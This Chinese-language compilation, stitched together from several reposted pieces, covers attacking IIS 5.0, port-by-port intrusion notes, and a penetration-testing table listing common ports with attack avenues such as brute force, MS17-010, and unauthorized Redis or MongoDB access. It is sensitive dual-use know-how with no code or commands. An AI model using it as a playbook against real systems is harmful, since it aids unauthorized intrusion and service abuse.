（1）对于windows2000的IIS5.0版本，⿊客使⽤远程溢出直接对远程主机进⾏溢出攻击，成功后直接获得系统权限（2）对于windows2000中IIS5.0版本，⿊客也尝试利⽤‘Microsoft IISCGI’⽂件名错误解码漏洞攻击。

使⽤X-SCAN可直接探测到IIS漏洞。

（3）IIS写权限漏洞是由于IIS配置不当造成的安全问题，攻击者可向存在此类漏洞的服务器上传恶意代码，⽐如上传脚本⽊马扩⼤控制权限。

（4）普通的http封包是没有经过加密就在⽹络中传输的，这样就可通过嗅探类⼯具截取到敏感的数据。

如使⽤Cain⼯具完成此类渗透。

（5）80端⼝的攻击，更多的是采⽤脚本渗透技术，利⽤web应⽤程序的漏洞进⾏渗透是⽬前很流⾏的攻击⽅式。

（6）对于渗透只开放80端⼝的服务器来说，难度很⼤。

利⽤端⼝复⽤⼯具可解决此类技术难题。

（7）CC攻击效果不及DDOS效果明显，但是对于攻击⼀些⼩型web站点还是⽐较有⽤的。

常见的入侵端口：端口：0服务：Reserved说明：通常用于分析操作系统。

这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。

一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。

(我被这样入侵过,一般感觉计算机运行慢或是你感觉有问题存在,先去查ip,如果有入侵赶紧断掉网,如果晚了他可能就会盗取你很多帐号或资料.)­端口：1服务：tcpmux说明：这显示有人在寻找SGI Irix机器。

Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。

Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。

许多管理员在安装后忘记删除这些帐户。

因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。

­端口：7服务：Echo说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。

­端口：19服务：Character Generator说明：这是一种仅仅发送字符的服务。

UDP版本将会在收到UDP包后回应含有垃圾字符的包。

TCP连接时会发送含有垃圾字符的数据流直到连接关闭。

HACKER利用IP欺骗可以发动DoS 攻击。

伪造两个chargen服务器之间的UDP包。

同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。

­端口：21服务：FTP说明：FTP服务器所开放的端口，用于上传、下载。

最常见的攻击者用于寻找打开anonymous 的FTP服务器的方法。

这些服务器带有可读写的目录。

木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。

常见⾼危端⼝端⼝服务渗透测试tcp 20,21FTP（⽂件传输协议）允许匿名的上传下载,爆破,嗅探,win提权,远程执⾏(proftpd 1.3.5),各类后门(proftpd,vsftp 2.3.4) tcp 22SSH （安全外壳协议）可根据已搜集到的信息尝试爆破,v1版本可中间⼈,ssh隧道及内⽹代理转发,⽂件传输等等tcp 23Telnet （远程终端协议）爆破,嗅探,⼀般常⽤于路由,交换登陆,可尝试弱⼝令tcp 25SMTP（简单邮件传输协议）邮件伪造,vrfy/expn查询邮件⽤户信息,可使⽤smtp-user-enum⼯具来⾃动跑tcp/udp 53DNS（域名系统）允许区域传送,dns劫持,缓存投毒,欺骗以及各种基于dns隧道的远控tcp/udp 69TFTP （简单⽂件传送协议）尝试下载⽬标及其的各类重要配置⽂件tcp 80-89,443,8440-8450,8080-8089各种常⽤的Web服务端⼝可尝试经典的topn,vpn,owa,webmail,⽬标oa,各类Java控制台,各类服务器Web管理⾯板,各类Web中间件漏洞利⽤,各类Web框架漏洞利⽤等等……tcp 110POP3（邮局协议版本3 ）可尝试爆破,嗅探tcp 111,2049NFS（⽹络⽂件系统）权限配置不当tcp 137,139,445SMB（NETBIOS协议）可尝试爆破以及smb⾃⾝的各种远程执⾏类漏洞利⽤,如,ms08-067,ms17-010,嗅探等……tcp 143IMAP（邮件访问协议）可尝试爆破udp 161SNMP（简单⽹络管理协议）爆破默认团队字符串,搜集⽬标内⽹信息tcp 389LDAP（轻量⽬录访问协议）ldap注⼊,允许匿名访问,弱⼝令tcp 512,513,514Linux rexec （远程登录）可爆破,rlogin登陆tcp 873Rsync （数据镜像备份⼯具）匿名访问,⽂件上传tcp 1194OpenVPN（虚拟专⽤通道）想办法钓VPN账号,进内⽹tcp 1352Lotus（Lotus软件）弱⼝令,信息泄漏,爆破tcp 1433SQL Server（数据库管理系统）注⼊,提权,sa弱⼝令,爆破tcp 1521Oracle（甲⾻⽂数据库）tns爆破,注⼊,弹shell…tcp 1500ISPmanager（主机控制⾯板）弱⼝令tcp 1723PPTP（点对点隧道协议）爆破,想办法钓VPN账号,进内⽹tcp 2082,2083cPanel （虚拟机控制系统）弱⼝令tcp 2181ZooKeeper（分布式系统的可靠协调系统）未授权访问tcp 2601,2604Zebra （zebra路由）默认密码zerbratcp 3128Squid （代理缓存服务器）弱⼝令tcp 3312,3311kangle（web服务器）弱⼝令tcp 3306MySQL（数据库）注⼊,提权,爆破tcp 3389Windows rdp（桌⾯协议）shift后门[需要03以下的系统],爆破,ms12-020tcp 3690SVN（开放源代码的版本控制系统）svn泄露,未授权访问tcp 4848GlassFish（应⽤服务器）弱⼝令tcp 5000Sybase/DB2（数据库）爆破,注⼊tcp 5432PostgreSQL（数据库）爆破,注⼊,弱⼝令tcp 5900,5901,5902VNC（虚拟⽹络控制台，远控）弱⼝令爆破tcp 5984CouchDB（数据库）未授权导致的任意指令执⾏tcp 6379Redis（数据库）可尝试未授权访问,弱⼝令爆破tcp 7001,7002WebLogic（WEB应⽤系统）Java反序列化,弱⼝令tcp 7778Kloxo（虚拟主机管理系统）主机⾯板登录tcp 8000Ajenti（Linux服务器管理⾯板）弱⼝令tcp 8443Plesk（虚拟主机管理⾯板）弱⼝令tcp 8069Zabbix （系统⽹络监视）远程执⾏,SQL注⼊tcp 8080-8089Jenkins,JBoss （应⽤服务器）反序列化,控制台弱⼝令tcp 9080-9081,9090WebSphere（应⽤服务器）Java反序列化/弱⼝令tcp 9200,9300ElasticSearch （Lucene的搜索服务器）远程执⾏tcp 11211Memcached（缓存系统）未授权访问tcp 27017,27018MongoDB（数据库）爆破,未授权访问TCP 50000tcp 50070,50030SAP Managenment ConsoleHadoop（分布式⽂件系统）远程执⾏默认端⼝未授权访问SSH 是协议，通常使⽤ OpenSSH 软件实现协议应⽤。

常⽤端⼝号1（转）常⽤端⼝号有过⼀些⿊客攻击⽅⾯知识的读者都会知道，其实那些所谓的⿊客并不是像⼈们想象那样从天⽽降，⽽是实实在在从您的计算机"⼤门"中⾃由出⼊。

计算机的"⼤门"就是我们平常所说的"端⼝"，它包括计算机的物理端⼝，如计算机的串⼝、并⼝、输⼊/输出设备以及适配器接⼝等（这些端⼝都是可见的），但更多的是不可见的软件端⼝，在本⽂中所介绍的都是指"软件端⼝ "，但为了说明⽅便，仍统称为"端⼝"。

本⽂仅就端⼝的基础知识进⾏介绍，⼀、端⼝简介随着计算机⽹络技术的发展，原来物理上的接⼝（如键盘、⿏标、⽹卡、显⽰卡等输⼊/输出接⼝）已不能满⾜⽹络通信的要求，TCP/IP协议作为⽹络通信的标准协议就解决了这个通信难题。

TCP/IP协议集成到操作系统的内核中，这就相当于在操作系统中引⼊了⼀种新的输⼊/输出接⼝技术，因为在TCP/IP 协议中引⼊了⼀种称之为"Socket（套接字）"应⽤程序接⼝。

有了这样⼀种接⼝技术，⼀台计算机就可以通过软件的⽅式与任何⼀台具有Socket接⼝的计算机进⾏通信。

端⼝在计算机编程上也就是"Socket接⼝"。

有了这些端⼝后，这些端⼝⼜是如何⼯作呢？例如⼀台服务器为什么可以同时是Web服务器，也可以是FTP服务器，还可以是邮件服务器等等呢？其中⼀个很重要的原因是各种服务采⽤不同的端⼝分别提供不同的服务，⽐如：通常TCP/IP协议规定Web采⽤80号端⼝，FTP采⽤21号端⼝等，⽽邮件服务器是采⽤25号端⼝。

这样，通过不同端⼝，计算机就可以与外界进⾏互不⼲扰的通信。

据专家们分析，服务器端⼝数最⼤可以有65535个，但是实际上常⽤的端⼝才⼏⼗个，由此可以看出未定义的端⼝相当多。

这是那么多⿊客程序都可以采⽤某种⽅法，定义出⼀个特殊的端⼝来达到⼊侵的⽬的的原因所在。